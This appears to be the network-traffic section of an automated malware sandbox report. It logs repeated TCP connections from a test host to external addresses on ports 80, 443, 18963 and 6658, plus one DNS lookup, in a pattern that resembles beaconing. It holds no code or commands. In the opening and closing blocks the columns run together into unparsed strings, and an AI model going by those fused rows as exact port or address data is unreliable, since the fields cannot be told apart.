                                                                                                                                                                        Dec 19, 2024 15:46:11.067517996 CET49816443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:11.067533970 CET44349816116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:12.895088911 CET44349816116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:12.895359039 CET49816443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:12.896184921 CET44349816116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:12.896460056 CET49816443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:13.146950006 CET4981318963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:13.146987915 CET4981418963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:13.303086996 CET4981818963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:13.304027081 CET4981918963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:13.422743082 CET1896349818107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:13.422818899 CET4981818963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:13.423002005 CET4981818963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:13.423583031 CET1896349819107.163.56.232192.168.2.11
Dec 19, 2024 15:46:13.423657894 CET | 49819 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:13.426078081 CET | 49819 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:13.542841911 CET | 18963 | 49818 | 107.163.56.232 | 192.168.2.11
Dec 19, 2024 15:46:13.545819044 CET | 18963 | 49819 | 107.163.56.232 | 192.168.2.11
Dec 19, 2024 15:46:15.512242079 CET | 49816 | 443 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:15.512339115 CET | 443 | 49816 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:15.512399912 CET | 49816 | 443 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:15.661114931 CET | 49815 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:15.661407948 CET | 49820 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:15.781276941 CET | 80 | 49820 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:15.781443119 CET | 49820 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:15.781487942 CET | 80 | 49815 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:15.781534910 CET | 49815 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:15.781593084 CET | 49820 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:15.901906967 CET | 80 | 49820 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:17.492707014 CET | 49818 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:17.492888927 CET | 49820 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:17.492955923 CET | 49819 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:17.509908915 CET | 49821 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:17.624013901 CET | 49822 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:17.625360966 CET | 49823 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:17.630269051 CET | 18963 | 49821 | 107.163.56.232 | 192.168.2.11
Dec 19, 2024 15:46:17.630354881 CET | 49821 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:17.631674051 CET | 49821 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:17.743797064 CET | 18963 | 49822 | 107.163.56.232 | 192.168.2.11
Dec 19, 2024 15:46:17.743922949 CET | 49822 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:17.744081974 CET | 49822 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:17.744999886 CET | 80 | 49823 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:17.745083094 CET | 49823 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:17.745194912 CET | 49823 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:17.751297951 CET | 18963 | 49821 | 107.163.56.232 | 192.168.2.11
Dec 19, 2024 15:46:17.866477966 CET | 18963 | 49822 | 107.163.56.232 | 192.168.2.11
Dec 19, 2024 15:46:17.867511034 CET | 80 | 49823 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:19.448597908 CET | 80 | 49823 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:19.448678017 CET | 49823 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:19.451289892 CET | 49824 | 443 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:19.451351881 CET | 443 | 49824 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:19.451535940 CET | 49824 | 443 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:19.452012062 CET | 49824 | 443 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:19.452043056 CET | 443 | 49824 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:21.282916069 CET | 443 | 49824 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:21.283061981 CET | 49824 | 443 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:21.283679008 CET | 443 | 49824 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:21.283725977 CET | 49824 | 443 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:21.518675089 CET | 49822 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:21.518681049 CET | 49821 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:21.519321918 CET | 49825 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:21.639065981 CET | 18963 | 49825 | 107.163.56.232 | 192.168.2.11
Dec 19, 2024 15:46:21.641330957 CET | 49825 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:21.657778978 CET | 49825 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:21.663160086 CET | 49827 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:21.777674913 CET | 18963 | 49825 | 107.163.56.232 | 192.168.2.11
Dec 19, 2024 15:46:21.783030987 CET | 18963 | 49827 | 107.163.56.232 | 192.168.2.11
Dec 19, 2024 15:46:21.783130884 CET | 49827 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:21.783348083 CET | 49827 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:21.903434992 CET | 18963 | 49827 | 107.163.56.232 | 192.168.2.11
Dec 19, 2024 15:46:23.306061983 CET | 49824 | 443 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:23.306169033 CET | 443 | 49824 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:23.306380033 CET | 443 | 49824 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:23.306453943 CET | 49824 | 443 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:23.306473017 CET | 49824 | 443 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:23.411082983 CET | 49823 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:23.411362886 CET | 49828 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:23.531280994 CET | 80 | 49828 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:23.531302929 CET | 80 | 49823 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:23.531375885 CET | 49828 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:23.531404018 CET | 49823 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:23.531599045 CET | 49828 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:23.651278973 CET | 80 | 49828 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:25.304503918 CET | 80 | 49828 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:25.306220055 CET | 49828 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:25.308777094 CET | 49829 | 443 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:25.308829069 CET | 443 | 49829 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:25.308960915 CET | 49829 | 443 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:25.309207916 CET | 49829 | 443 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:25.309216976 CET | 443 | 49829 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:25.658559084 CET | 49825 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:25.658580065 CET | 49829 | 443 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:25.658612013 CET | 49827 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:25.775021076 CET | 49828 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:25.775347948 CET | 49830 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:25.776381016 CET | 49831 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:25.779928923 CET | 49832 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:25.895262957 CET | 80 | 49830 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:25.895333052 CET | 80 | 49828 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:25.895365000 CET | 49830 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:25.895395041 CET | 49828 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:25.895533085 CET | 49830 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:25.895992041 CET | 18963 | 49831 | 107.163.56.232 | 192.168.2.11
Dec 19, 2024 15:46:25.896054029 CET | 49831 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:25.896173954 CET | 49831 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:25.899585962 CET | 18963 | 49832 | 107.163.56.232 | 192.168.2.11
Dec 19, 2024 15:46:25.899641991 CET | 49832 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:25.899857998 CET | 49832 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:26.015300035 CET | 80 | 49830 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:26.015671015 CET | 18963 | 49831 | 107.163.56.232 | 192.168.2.11
Dec 19, 2024 15:46:26.019438028 CET | 18963 | 49832 | 107.163.56.232 | 192.168.2.11
Dec 19, 2024 15:46:27.531708002 CET | 6658 | 49811 | 107.163.56.251 | 192.168.2.11
Dec 19, 2024 15:46:27.531847000 CET | 49811 | 6658 | 192.168.2.11 | 107.163.56.251
Dec 19, 2024 15:46:27.643812895 CET | 49833 | 6658 | 192.168.2.11 | 107.163.56.251
Dec 19, 2024 15:46:27.763575077 CET | 6658 | 49833 | 107.163.56.251 | 192.168.2.11
Dec 19, 2024 15:46:27.763704062 CET | 49833 | 6658 | 192.168.2.11 | 107.163.56.251
Dec 19, 2024 15:46:27.764082909 CET | 49833 | 6658 | 192.168.2.11 | 107.163.56.251
Dec 19, 2024 15:46:27.883701086 CET | 6658 | 49833 | 107.163.56.251 | 192.168.2.11
Dec 19, 2024 15:46:28.409642935 CET | 80 | 49830 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:28.410218954 CET | 49830 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:28.412872076 CET | 49834 | 443 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:28.412935972 CET | 443 | 49834 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:28.413024902 CET | 49834 | 443 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:28.413367987 CET | 49834 | 443 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:28.413379908 CET | 443 | 49834 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:29.782747984 CET | 49834 | 443 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:29.782777071 CET | 49832 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:29.782813072 CET | 49831 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:29.783443928 CET | 49835 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:29.898111105 CET | 49836 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:29.898813963 CET | 49830 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:29.899068117 CET | 49837 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:29.903127909 CET | 18963 | 49835 | 107.163.56.232 | 192.168.2.11
Dec 19, 2024 15:46:29.903224945 CET | 49835 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:29.903470993 CET | 49835 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:30.018502951 CET | 18963 | 49836 | 107.163.56.232 | 192.168.2.11
Dec 19, 2024 15:46:30.018596888 CET | 49836 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:30.018723011 CET | 49836 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:30.018906116 CET | 80 | 49837 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:30.018966913 CET | 80 | 49830 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:30.018973112 CET | 49837 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:30.019015074 CET | 49830 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:30.019153118 CET | 49837 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:30.023008108 CET | 18963 | 49835 | 107.163.56.232 | 192.168.2.11
Dec 19, 2024 15:46:30.138820887 CET | 18963 | 49836 | 107.163.56.232 | 192.168.2.11
Dec 19, 2024 15:46:30.138849020 CET | 80 | 49837 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:32.407851934 CET | 80 | 49837 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:32.408255100 CET | 49837 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:32.411051989 CET | 49838 | 443 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:32.411106110 CET | 443 | 49838 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:32.412540913 CET | 49838 | 443 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:32.413048983 CET | 49838 | 443 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:32.413064957 CET | 443 | 49838 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:33.798470020 CET | 49836 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:33.798506021 CET | 49835 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:33.798511982 CET | 49838 | 443 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:33.799065113 CET | 49839 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:33.917476892 CET | 49840 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:33.917623997 CET | 49837 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:33.917826891 CET | 49841 | 80 | 192.168.2.11 | 116.133.8.92
Dec 19, 2024 15:46:33.918709993 CET | 18963 | 49839 | 107.163.56.232 | 192.168.2.11
Dec 19, 2024 15:46:33.918798923 CET | 49839 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:33.919154882 CET | 49839 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:34.039750099 CET | 18963 | 49840 | 107.163.56.232 | 192.168.2.11
Dec 19, 2024 15:46:34.039813995 CET | 80 | 49841 | 116.133.8.92 | 192.168.2.11
Dec 19, 2024 15:46:34.039861917 CET | 49840 | 18963 | 192.168.2.11 | 107.163.56.232
Dec 19, 2024 15:46:34.039912939 CET | 49841 | 80 | 192.168.2.11 | 116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:34.040075064 CET4984018963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:34.040092945 CET8049837116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:34.040200949 CET4983780192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:34.040631056 CET4984180192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:34.041311026 CET1896349839107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:34.159811974 CET1896349840107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:34.160343885 CET8049841116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:35.873550892 CET8049841116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:35.873635054 CET4984180192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:35.876296043 CET49842443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:35.876348019 CET44349842116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:35.876446962 CET49842443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:35.876902103 CET49842443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:35.876916885 CET44349842116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:37.814063072 CET49842443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:37.814093113 CET4983918963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:37.814097881 CET4984018963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:37.814944029 CET4984318963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:37.930440903 CET4984180192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:37.930794954 CET4984480192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:37.931157112 CET4984518963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:37.935432911 CET1896349843107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:37.935518980 CET4984318963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:37.935661077 CET4984318963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:38.054399967 CET8049844116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:38.054450989 CET1896349845107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:38.054490089 CET8049841116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:38.054553032 CET4984518963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:38.054569006 CET4984480192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:38.054578066 CET4984180192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:38.057023048 CET1896349843107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:38.058943033 CET4984480192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:38.059036970 CET4984518963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:38.179455042 CET8049844116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:38.179498911 CET1896349845107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:39.809197903 CET8049844116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:39.809292078 CET4984480192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:39.821691036 CET49846443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:39.821768045 CET44349846116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:39.821841002 CET49846443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:39.822706938 CET49846443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:39.822741032 CET44349846116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:41.527410984 CET49846443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:41.527426958 CET4984518963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:41.527473927 CET4984318963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:41.528561115 CET4984718963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:41.648176908 CET1896349847107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:41.648257017 CET4984718963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:41.652415037 CET4984480192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:41.652764082 CET4984880192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:41.653532982 CET4984718963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:41.653573036 CET4984918963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:41.772516012 CET8049848116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:41.772598028 CET4984880192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:41.772763014 CET8049844116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:41.772815943 CET4984480192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:41.773075104 CET1896349847107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:41.773247004 CET1896349849107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:41.773252010 CET4984880192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:41.773299932 CET4984918963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:41.773751974 CET4984918963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:41.894203901 CET8049848116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:41.894682884 CET1896349849107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:42.064074993 CET4984880192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:42.064116955 CET4984918963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:42.064125061 CET4984718963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:42.219966888 CET4985018963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:42.221236944 CET4985118963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:42.236319065 CET4985280192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:42.340899944 CET1896349850107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:42.341866970 CET1896349851107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:42.342317104 CET4985018963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:42.342484951 CET4985018963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:42.342487097 CET4985118963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:42.342596054 CET4985118963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:42.357253075 CET8049852116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:42.357429981 CET4985280192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:42.357618093 CET4985280192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:42.462362051 CET1896349850107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:42.462398052 CET1896349851107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:42.477220058 CET8049852116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:44.107714891 CET8049852116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:44.107927084 CET4985280192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:44.110707998 CET49853443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:44.110750914 CET44349853116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:44.110847950 CET49853443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:44.111535072 CET49853443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:44.111553907 CET44349853116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:46.220248938 CET4985018963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:46.220304012 CET4985118963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:46.220324993 CET49853443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:46.344710112 CET4985418963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:46.344769955 CET4985518963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:46.344909906 CET4985280192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:46.345016003 CET4985680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:46.467216969 CET1896349854107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:46.467253923 CET1896349855107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:46.467274904 CET8049856116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:46.467375040 CET4985518963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:46.467381001 CET4985418963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:46.467387915 CET4985680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:46.467431068 CET8049852116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:46.467531919 CET4985418963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:46.467609882 CET4985280192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:46.467701912 CET4985518963192.168.2.11107.163.56.232
                                                                                                                                                                        Dec 19, 2024 15:46:46.467892885 CET4985680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:46.589394093 CET1896349854107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:46.589639902 CET1896349855107.163.56.232192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:46.589756012 CET8049856116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:48.311642885 CET8049856116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:48.311762094 CET4985680192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:48.334960938 CET49857443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:48.335016012 CET44349857116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:48.335091114 CET49857443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:48.335483074 CET49857443192.168.2.11116.133.8.92
                                                                                                                                                                        Dec 19, 2024 15:46:48.335494995 CET44349857116.133.8.92192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:46:49.657000065 CET665849833107.163.56.251192.168.2.11
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 15:44:43.040047884 CET | 54135 | 53 | 192.168.2.11 | 1.1.1.1
Dec 19, 2024 15:44:43.177288055 CET | 53 | 54135 | 1.1.1.1 | 192.168.2.11

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 19, 2024 15:44:43.040047884 CET | 192.168.2.11 | 1.1.1.1 | 0xa47c | Standard query (0) | blog.sina.com.cn | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
